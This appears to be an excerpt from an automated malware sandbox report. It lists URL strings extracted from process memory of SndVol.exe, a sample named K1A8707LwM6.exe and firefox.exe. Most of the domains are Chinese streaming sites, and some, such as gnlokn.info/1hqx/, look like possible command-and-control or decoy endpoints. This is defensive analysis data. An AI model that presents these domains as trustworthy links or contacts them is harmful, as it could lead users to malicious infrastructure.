                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.9xiuzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aguardiente.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.americanstar.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.antuzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.automester.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.autp.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.babygirlnames.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beautifullady.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=248421974679
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beibizhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bitza.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bolezhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.caobizhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.careerservice.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chuyuzhibo.net/binding
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.companybuilder.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cyberpolice.cn
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dajingzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.douquzhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.douquzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.douzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.duniangzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dynaform.net
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eduexpo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ellanse.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eroticstore.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eventmagic.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.firstdial.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.firstmusic.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.genesisenergy.net/binding
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.globalreview.net
                Source: K1A8707LwM6.exe, 00000011.00000002.3514314819.0000000005368000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gnlokn.info
                Source: K1A8707LwM6.exe, 00000011.00000002.3514314819.0000000005368000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gnlokn.info/1hqx/
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gstec.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hackpack.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.haicaozhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hedco.net/binding
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jindouzhibo.net
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jutuzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lamachine.net
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lanyunzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.legalvideos.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lemed.net
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/15wz/
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d4
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/adblock.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/appsdetail.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/bl.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/broadcast.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/common.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/header.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/index.umd.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/js.js
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/nc.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/pcmodule.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/pullup.js
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/realNameAuth.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/picture/anva-zilv.png
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.pn
